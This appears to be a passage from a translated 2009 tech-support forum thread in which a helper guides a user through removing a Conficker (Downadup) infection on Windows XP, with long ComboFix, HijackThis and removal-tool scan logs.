"5011:TCP"= 5011:TCP:TCP Port 5011
"5012:TCP"= 5012:TCP:TCP Port 5012
"5013:TCP"= 5013:TCP:TCP Port 5013
"5014:TCP"= 5014:TCP:TCP Port 5014
"5015:TCP"= 5015:TCP:TCP Port 5015
"5016:TCP"= 5016:TCP:TCP Port 5016
"5017:TCP"= 5017:TCP:TCP Port 5017
"5018:TCP"= 5018:TCP:TCP Port 5018
"5019:TCP"= 5019:TCP:TCP Port 5019
"5020:TCP"= 5020:TCP:TCP Port 5020
"7533:TCP"= 7533:TCP:messenger
"2562:TCP"= 2562:TCP:messenger
"3117:TCP"= 3117:TCP:messenger
"8743:TCP"= 8743:TCP:messenger
"3325:TCP"= 3325:TCP:messenger
"6243:TCP"= 6243:TCP:messenger
"5575:TCP"= 5575:TCP:messenger
"5764:TCP"= 5764:TCP:messenger
"6274:TCP"= 6274:TCP:messenger
"7611:TCP"= 7611:TCP:messenger
"1721:TCP"= 1721:TCP:messenger
"2821:TCP"= 2821:TCP:messenger
"7754:TCP"= 7754:TCP:messenger
"3354:TCP"= 3354:TCP:messenger

R0 fsbts;fsbts;c:\windows\system32\drivers\fsbts.sys [2009.06.19. 19:18 26624]
R0 PCTCore;PCTools KDS;c:\windows\system32\drivers\PCTCore.sys [2009.06.18. 8:02 130936]
R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [2009.01.13. 19:16 114768]
R1 nltdi;nltdi;c:\windows\system32\drivers\nltdi.sys [2007.04.23. 13:03 82200]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2008.12.22. 12:06 8944]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [2008.12.22. 12:05 55024]
R1 vbev5mp;vbev5mp;c:\windows\system32\drivers\VBEV5MP.sys [2003.11.12. 9:26 56064]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2009.01.13. 19:16 20560]
R2 thdudf;TOSHIBA UDF2.5 Reader File System Driver;c:\windows\system32\drivers\thdudf.sys [2008.11.23. 10:47 66944]
R3 AtiHdmiService;ATI Function Driver for HDMI Service;c:\windows\system32\drivers\AtiHdmi.sys [2009.06.10. 21:12 99856]
S2 OMSCAN;OMSCAN;\Sys --> \Sys [?]
S2 PStrip;PSTRIP;\??\c:\windows\system32\DRIVERS\PSTRIP.SYS --> c:\windows\system32\DRIVERS\PSTRIP.SYS [?]
S2 SOFTLOK;SOFTLOK; [x]
S3 RkPavproc1;RkPavproc1;\??\c:\windows\system32\drivers\RkPavproc1.sys --> c:\windows\system32\drivers\RkPavproc1.sys [?]
S3 SASENUM;SASENUM;c:\program files\SUPERAntiSpyware\SASENUM.SYS [2008.12.22. 12:06 7408]
S3 sdAuxService;PC Tools Auxiliary Service;c:\program files\Spyware Doctor\pctsAuxs.exe [2009.01.13. 23:01 348752]
S3 SndTAudio;SndTAudio;c:\windows\system32\drivers\SndTAudio.sys [2009.02.21. 16:49 23096]
S3 SndTVideo;SndTVideo;c:\windows\system32\drivers\SndTVideo.sys [2009.02.21. 16:49 3768]
S3 TNPacket;T-Systems Nova Packet Capture Driver;c:\progra~1\MATVAD~1\TNPACKET.SYS [2002.10.09. 14:38 9376]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{B2C3BB6B-E005-4246-B8E5-DF0A4D073CDC}]
c:\program files\PixiePack Codec Pack\InstallerHelper.exe
.
Contents of the 'Scheduled Tasks' folder

2009-06-13 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]
.
.
------- Supplementary Scan -------
.
IE: Az összes letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlall.htm
IE: Kijelölés letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlselected.htm
IE: Letöltés Free Download Managerrel - file://c:\program files\Free Download Manager\dllink.htm
IE: Video letöltése a Free Download Manager-rel - file://c:\program files\Free Download Manager\dlfvideo.htm
FF - ProfilePath -
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-06-20 08:41
Windows 5.1.2600 Szervizcsomag 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
LXCCCATS = rundll32 c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\OMSCAN]
"ImagePath"="\Sys"

[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\vbev5mp]
"ImagePath"="system32\DRIVERS\vbev5mp.sys"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{6BC31396-740D-B4B5-B08B-BC74AF917057}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
"oamgpcigfaaenpmnfhmdlibbdkgljh"=hex:64,61,6d,69,6c,62,62,6a,00,80
"oaagfogeicofmdgkidomfbofldjfcb"=hex:6a,61,62,6a,65,63,6c,68,66,6f,65,65,6f,69,
61,6d,66,63,62,61,00,fd
"nagbfafnaficdjjghlpnjmolhmie"=hex:6a,61,62,6a,65,63,6c,68,66,6f,65,65,6f,69,
61,6d,66,63,62,61,00,fd
"eaibpofbol"=hex:65,61,6b,65,69,69,61,6a,69,6d,00,77
"calgna"=hex:69,61,6d,69,69,6e,68,65,62,65,67,6f,64,66,6e,6e,64,6a,00,ff

[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{A873A6C7-2DF7-2ABE-BD1E-352FFC8F3EDB}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
"ianhjpccamlebclpdj"=hex:6c,61,6a,63,69,6a,68,6f,68,61,62,6a,61,63,68,6e,70,63,
64,63,6f,6a,70,64,00,00
"hadhpenhafikchhp"=hex:6c,61,6a,63,69,6a,68,6f,68,61,62,6a,61,63,68,6e,70,63,
64,63,6f,6a,70,64,00,00
"hajejenaljhiekcp"=hex:70,61,68,65,70,64,6b,64,62,64,67,61,6a,66,67,62,6d,62,
63,69,70,66,63,69,63,69,6e,69,6c,70,61,66,00,ff
"hajejenaiimmdlif"=hex:70,61,6a,63,69,6a,68,6f,69,62,65,67,6b,63,63,6c,68,68,
6c,62,63,63,69,63,6f,69,61,6d,66,6d,61,64,00,ff

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\ProgID]
@DACL=(02 0000)
@="AcroIEHelper.AcroIEHlprObj.1"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\Programmable]
@DACL=(02 0000)
@=""

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\TypeLib]
@DACL=(02 0000)
@="{5F226421-415D-408D-9A09-0DCD94E25B48}"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\VersionIndependentProgID]
@DACL=(02 0000)
@="AcroIEHelper.AcroIEHlprObj"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"cd042efbbd7f7af1647644e76e06692b"=hex:e2,63,26,f1,3f,c8,ff,68,1f,4a,1f,62,be,
75,3a,b2,e2,63,26,f1,3f,c8,ff,68,e9,b3,86,b8,e4,d1,ea,3b,e2,63,26,f1,3f,c8,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"bca643cdc5c2726b20d2ecedcc62c59b"=hex:6a,9c,d6,61,af,45,84,18,01,89,d4,a0,4f,
6e,fc,9a,6a,9c,d6,61,af,45,84,18,21,a0,43,91,1b,6a,36,7e,6a,9c,d6,61,af,45,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"2c81e34222e8052573023a60d06dd016"=hex:ff,7c,85,e0,43,d4,0e,fe,06,03,14,1d,04,
bb,49,9f,ff,7c,85,e0,43,d4,0e,fe,ec,a9,de,5a,81,77,d1,a7,ff,7c,85,e0,43,d4,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"2582ae41fb52324423be06337561aa48"=hex:86,8c,21,01,be,91,eb,e7,f2,f2,ac,06,dc,
4c,8a,90,86,8c,21,01,be,91,eb,e7,84,e4,60,c6,bf,7f,2d,5c,86,8c,21,01,be,91,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"caaeda5fd7a9ed7697d9686d4b818472"=hex:cd,44,cd,b9,a6,33,6c,cd,8d,bf,95,fa,37,
aa,87,bc,f5,1d,4d,73,a8,13,5c,05,0f,12,eb,28,47,52,54,3e,f5,1d,4d,73,a8,13,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"a4a1bcf2cc2b8bc3716b74b2b4522f5d"=hex:df,20,58,62,78,6b,cf,c8,b4,bc,e3,1d,26,
3f,bb,68,df,20,58,62,78,6b,cf,c8,68,17,3e,93,cf,44,38,83,df,20,58,62,78,6b,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"4d370831d2c43cd13623e232fed27b7b"=hex:97,20,4e,9a,c7,f1,35,ee,f8,4a,92,73,bb,
9d,91,3c,fb,a7,78,e6,12,2f,9a,ea,a5,1d,f7,8f,b2,28,4c,55,fb,a7,78,e6,12,2f,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"1d68fe701cdea33e477eb204b76f993d"=hex:01,3a,48,fc,e8,04,4a,f1,6a,37,68,67,7f,
24,23,a7,01,3a,48,fc,e8,04,4a,f1,1a,1a,2d,37,d5,36,0f,8f,01,3a,48,fc,e8,04,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"1fac81b91d8e3c5aa4b0a51804d844a3"=hex:51,fa,6e,91,28,9e,14,cc,8d,a5,ea,04,7c,
4e,07,ae,f6,0f,4e,58,98,5b,89,c9,bf,31,4b,2e,bc,38,22,b9,f6,0f,4e,58,98,5b,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"f5f62a6129303efb32fbe080bb27835b"=hex:3d,ce,ea,26,2d,45,aa,78,c2,de,89,dc,25,
fd,22,42,3d,ce,ea,26,2d,45,aa,78,45,b0,b2,5b,5f,e7,a2,55,3d,ce,ea,26,2d,45,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"fd4e2e1a3940b94dceb5a6a021f2e3c6"=hex:2a,b7,cc,b5,b9,7f,41,e7,28,80,fe,74,82,
c9,f3,1e,2a,b7,cc,b5,b9,7f,41,e7,c8,92,0b,9d,1c,07,4a,f2,2a,b7,cc,b5,b9,7f,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"8a8aec57dd6508a385616fbc86791ec2"=hex:6c,43,2d,1e,aa,22,2f,9c,e9,f9,e4,60,f0,
ba,22,6b,6c,43,2d,1e,aa,22,2f,9c,93,70,70,73,73,0b,0b,30,6c,43,2d,1e,aa,22,\

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\•€|˙˙˙˙"•€|ţ»Ów*]
"AB141C35E9F4BF344B9FC010BB17F68A"="02:\\Software\\Adobe\\FeatureSubscriptions\\DVAAdobeDocMeta\\{53C141BA-4F9E-43FB-B4F9-0C01BB716FA8}\\Registered"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Reinstall\hŃ*.Poc]
"DisplayName"="?\11"
"DeviceDesc"="?\11"
"ProviderName"="?\11???\11\08"
"MFG"="??\09"
"ReinstallString"="8.470.0.0000"
"DeviceInstanceIds"=multi:"k:\\driver\\ati driver\\xp\\driver\\xp_inf\\cx_60150.inf\00"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1612)
c:\program files\SUPERAntiSpyware\SASWINLO.dll
c:\windows\system32\Ati2evxx.dll

- - - - - - - > 'lsass.exe'(1676)
c:\windows\system32\relog_ap.dll

- - - - - - - > 'explorer.exe'(5756)
c:\program files\ComfortClipboard\CClipboardH.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\msi.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Alwil Software\Avast4\aswUpdSv.exe
c:\program files\Alwil Software\Avast4\ashServ.exe
c:\program files\Common Files\Acronis\Schedule2\schedul2.exe
c:\program files\ComfortClipboard\CClipboardCm.exe
c:\program files\Virtual CD v5\System\VC5Tray.exe
c:\windows\ATKKBService.exe
c:\program files\cFosSpeed\spd.exe
c:\program files\Comodo\Firewall\cmdagent.exe
c:\program files\Diskeeper Corporation\Diskeeper\DkService.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
c:\program files\Common Files\LightScribe\LSSrvc.exe
c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
c:\windows\system32\lvhidsvc.exe
c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
c:\program files\NetLimiter 2 Pro\nlsvc.exe
c:\program files\CDBurnerXP\NMSAccessU.exe
c:\windows\system32\HPZipm12.exe
c:\program files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\HHVcdV5Sys\VC5SecS.exe
c:\program files\NetLimiter 2 Pro\NLClient.exe
c:\program files\Alwil Software\Avast4\ashMaiSv.exe
c:\program files\Alwil Software\Avast4\ashWebSv.exe
c:\windows\system32\lxcccoms.exe
.
**************************************************************************
.
Completion time: 2009-06-20 8:46 - machine was rebooted
ComboFix-quarantined-files.txt 2009-06-20 06:46
ComboFix2.txt 2009-01-13 13:05

Pre-Run: 341 467 136 bájt szabad
Post-Run: 686 092 288 bájt szabad

Current=3 Default=3 Failed=2 LastKnownGood=4 Sets=1,2,3,4
461


Here is the Downadup log as well


Symantec W32.Downadup Removal Tool 1.0.5

C:\32788R22FWJFW\setcsum.cfexe: failed in scanning.
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\VK33IP8M\kxkmcghi[1].gif: W32.Downadup.B (unrepairable) (deleted)
C:\WINDOWS\system32\x: W32.Downadup.B (unrepairable) (deleted)
F:\JÁTÉKMAYGARÍTÁSOK\Delta Force Black Hawk Down cracks\Delta_Force Crack\Delta Force Black Hawk Down Crack by EFC87\efc87 - Delta Force - Black Hawk Down Crack.exe: failed in scanning.
F:\Programok,egyebek\MÁSOLÁS\MÁSOLÁS VÉDELEM\PROGRAMOK\(Hacker Stuff) - Softice 9X-Nt-2K,w32Dasm,Hiew,Hex Workshop, Tools To Crack Cracked Software\swlipi32\swlipi32.exe: failed in scanning.
F:\Programok,egyebek\SEGÉD ÉS RENDSZER PROGRAMOK\Töredezettség mentesítők\Disk Watchman\Disk Watchman v1.7.151 Incl.Keygen-ECLiPSE\setup_pack\dwsetup.exe: failed in scanning.
F:\Programok,egyebek\SEGÉD ÉS RENDSZER PROGRAMOK\Töredezettség mentesítők\Disk Watchman\Disk Watchman1.5 158.exe: failed in scanning.
scheduled job: Unable to enumerate scheduled jobs. Returned status 2184

registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List: 8806:TCP (value deleted)
registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets: dl (value deleted)
registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets: ds (value deleted)
registry: HKLM\system\CurrentControlSet\Services\BITS: Start (value set to 0x00000003 (3))

W32.Downadup has been successfully removed from your computer!

Here is the report:

The total number of the scanned files: 418130
The number of deleted threat files: 2
The number of threat processes terminated: 0
The number of threat threads terminated: 0
The number of registry entries fixed: 4


Sat Jun 20, 2009 7:56
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why it looks the way it does,
Post
OK, do what I wrote and we'll continue tomorrow.


Fri Jun 19, 2009 20:46
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
We had already disabled autorun a while ago, and System Restore was also disabled earlier (but I did what you just wrote). Booting into safe mode was extremely slow (after 7 minutes of churning). The scanners are now running in safe mode, but they will take a while and I have to go to work; if you are around tomorrow, we could continue then.

I'm writing from another machine right now.


Fri Jun 19, 2009 18:18
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
OK, I'm doing it


Fri Jun 19, 2009 17:46
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
OK, your machine has been attacked by Conficker; go through all of this:
:arrow:
Quote:
Click the Start button, then Settings, Control Panel.
Double-click "System" and then "System Restore". Tick "Turn off System Restore on all drives" and click "Apply". Restart the machine.

:arrow: disable autorun and autoplay with this program
http://download.viry.cz/tools/autorun.zip
download it, run it, restart,
:arrow: plug your USB sticks and pen drives into the machine and leave them plugged in,
:arrow: download these 2 programs and run both of them in safe mode; post here the log they produce.
http://download.viry.cz/removers/FixDownadup.exe
ftp://ftp.f-secure.com/anti-virus/tools ... wnadup.zip
:arrow:
Quote:
download ComboFix in normal Windows and run it like this; post the log here,
Download this ComboFix and put it on the DESKTOP, close everything, and turn off the Spyware Terminator shield and the Spybot TeaTimer shield too, if you have them. No program may be running. Run it as administrator in normal Windows: double-click the ComboFix icon > agree......
And now you just watch and don't touch anything; the machine restarts by itself, finishes the scan, and creates combofix.txt; post that here and
http://download.bleepingcomputer.com/sUBs/ComboFix.exe


Fri Jun 19, 2009 14:18
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
Oh, and svchost.exe keeps reporting a memory address: written error; if I click OK, the machine freezes.


Fri Jun 19, 2009 11:24
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
Logfile of random's system information tool 1.06 (written by random/random)
Run by PALI at 2009-06-19 11:53:00
Microsoft Windows XP Professional Szervizcsomag 2
System drive C: has 515 MB (2%) free of 30 GB
Total RAM: 1023 MB (42% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:53:14, on 2009.06.19.
Platform: Windows XP Szervizcsomag 2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0013)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\TVR\RecSche.exe
C:\Program Files\ChrisTV\ChrisTV_Agent.exe
C:\Program Files\Lexmark 3300 Series\lxccmon.exe
C:\Program Files\cFosSpeed\cFosSpeed.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\HHVcdV5Sys\VC5Play.exe
C:\Program Files\Unlocker\UnlockerAssistant.exe
C:\Program Files\ComfortClipboard\CClipboard.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\Comodo\Firewall\CPF.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files\Spyware Doctor\pctsTray.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\ATKKBService.exe
C:\Program Files\ComfortClipboard\CClipboardCm.exe
C:\Program Files\cFosSpeed\spd.exe
C:\Program Files\Virtual CD v5\System\VC5Tray.exe
C:\Program Files\DAEMON Tools\daemon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\system32\lvhidsvc.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\NetLimiter 2 Pro\nlsvc.exe
C:\Program Files\CDBurnerXP\NMSAccessU.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Program Files\HHVcdV5Sys\VC5SecS.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\system32\lxcccoms.exe
C:\WINDOWS\System32\alg.exe
C:\wincmd\WINCMD32.EXE
C:\Program Files\uTorrent\uTorrent.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Downloads\RSIT.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
c:\Program Files\HijackThis\PALI.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkId=54843
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: SnagIt Toolbar Loader - {00C6482D-C502-44C8-8409-FCE54AD9C208} - C:\Program Files\TechSmith\Snagit 9\SnagitBHO.dll
O2 - BHO: Adobe PDF Reader hivatkozássúgó - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: BitComet ClickCapture - {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} - C:\Program Files\BitComet\tools\BitCometBHO_1.2.2.28.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: ACA Capture - {93C69D87-A11D-4FFC-BC56-BE7EE0D235BA} - C:\Program Files\ACASystems\ACACapturePro\scap003p.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Snagit - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files\TechSmith\Snagit 9\SnagitIEAddin.dll
O4 - HKLM\..\Run: [RecSche] "C:\Program Files\TVR\RecSche.exe"
O4 - HKLM\..\Run: [ChrisTV Agent] "C:\Program Files\ChrisTV\ChrisTV_Agent.exe"
O4 - HKLM\..\Run: [PinnacleDriverCheck] C:\WINDOWS\system32\\PSDrvCheck.exe
O4 - HKLM\..\Run: [amd_dc_opt] C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe
O4 - HKLM\..\Run: [lxccmon.exe] "C:\Program Files\Lexmark 3300 Series\lxccmon.exe"
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Lexmark Fax Solutions\fm3032.exe" /s
O4 - HKLM\..\Run: [cFosSpeed] C:\Program Files\cFosSpeed\cFosSpeed.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [VC5Player] C:\Program Files\HHVcdV5Sys\VC5Play.exe
O4 - HKLM\..\Run: [UnlockerAssistant] "C:\Program Files\Unlocker\UnlockerAssistant.exe"
O4 - HKLM\..\Run: [CClipboard] C:\Program Files\ComfortClipboard\CClipboard.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe" /s
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [ASUSGamerOSD] C:\Program Files\ASUS\GamerOSD\GamerOSD.exe
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [LXCCCATS] rundll32 C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\Comodo\Firewall\CPF.exe" /background
O4 - HKLM\..\Run: [ISTray] "C:\Program Files\Spyware Doctor\pctsTray.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\Msmsgs.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools] "C:\Program Files\DAEMON Tools\daemon.exe" -lang 1033
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: hpoddt01.exe.lnk = ?
